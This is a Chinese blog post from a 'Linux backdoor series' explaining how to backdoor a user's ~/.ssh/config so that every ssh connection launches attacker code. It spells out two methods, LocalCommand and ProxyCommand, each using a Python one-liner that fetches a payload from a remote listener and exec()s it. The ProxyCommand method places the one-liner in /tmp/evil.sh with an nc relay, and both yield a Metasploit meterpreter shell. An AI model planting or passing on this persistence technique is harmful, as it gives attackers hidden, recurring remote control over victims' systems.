ssh 客户端配置文件加载顺序
命令行参数 > ~/.ssh/config > /etc/ssh/ssh_config
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
# Host *
# ForwardAgent no
# ForwardX11 no
# RhostsRSAAuthentication no
# RSAAuthentication yes
# PasswordAuthentication yes
# HostbasedAuthentication no
# GSSAPIAuthentication no
# GSSAPIDelegateCredentials no
# GSSAPIKeyExchange no
# GSSAPITrustDNS no
# BatchMode no
# CheckHostIP yes
# AddressFamily any
# ConnectTimeout 0
# StrictHostKeyChecking ask
# IdentityFile ~/.ssh/identity
# IdentityFile ~/.ssh/id_rsa
# IdentityFile ~/.ssh/id_dsa
# IdentityFile ~/.ssh/id_ecdsa
# IdentityFile ~/.ssh/id_ed25519
# Port 22
# Protocol 2
# Cipher 3des
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
# MACs hmac-md5,hmac-sha1,[email protected],hmac-ripemd160
# EscapeChar ~
# Tunnel no
# TunnelDevice any:any
# PermitLocalCommand no
# VisualHostKey no
# ProxyCommand ssh -q -W %h:%p gateway.example.com
# RekeyLimit 1G 1h
#
# Uncomment this if you want to use .local domain
# Host *.local
# CheckHostIP no
Host *
GSSAPIAuthentication yes
# If this option is set to yes then remote X11 clients will have full access
# to the original X11 display. As virtually no X11 client supports the untrusted
# mode correctly we set this to yes.
ForwardX11Trusted yes
# Send locale-related environment variables
SendEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES
SendEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT
SendEnv LC_IDENTIFICATION LC_ALL LANGUAGE
SendEnv XMODIFIERS
这里着重介绍两个参数,剩下的参数可以查看下面这个文档
SSH config file syntax and how-tos for configuring the OpenSSH client
LocalCommand
参数含义:当连接远程主机成功后,在本地计算机执行的命令
使用msf进行测试
-
msf设置监听
![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://10.168.1.105:8080/i3mYH5hdtkO1gt', context=ssl._create_unverified_context());exec(r.read());"ubuntu server 16.04 64位 版本默认python为python3,所以这里将python改为python3
python3 -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://10.168.1.105:8080/i3mYH5hdtkO1gt', context=ssl._create_unverified_context());exec(r.read());"
-
创建
~/.ssh/config如果.ssh目录不存在就创建这个目录,可以直接将/etc/ssh/ssh_config复制过来![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
-
设置
~/.ssh/config中Host为*处设置LocalCommand参数为我们的msf恶意命令,同时设置PermitLocalCommand的值为 yes,并保存![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
-
ssh连接其他主机
![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
成功反弹shell
-
成功获取 meterpreter shell
![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
LocalCommand参数可用
ProxyCommand
连接主机过程中设置代理所使用的命令
重复过程不再赘述,仅写标题
-
msf设置监听
-
创建
~/.ssh/config如果.ssh目录不存在就创建这个目录,可以直接将/etc/ssh/ssh_config复制过来 -
创建恶意脚本文件
/tmp/evil.shpython3 -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://10.168.1.105:8080/i3mYH5hdtkO1gt', context=ssl._create_unverified_context());exec(r.read());"
nc $1 $2![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
-
设置
~/.ssh/config中Host为*处设置ProxyCommand参数为执行我们的恶意脚本,并保存![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
-
ssh连接其他主机
![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
-
成功获取meterpreter shell
![SSH Config 后门 | Linux 后门系列]( "SSH Config 后门 | Linux 后门系列")
ProxyCommand 参数可用
往期文章:
本文始发于微信公众号(漫流砂):SSH Config 后门 | Linux 后门系列
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论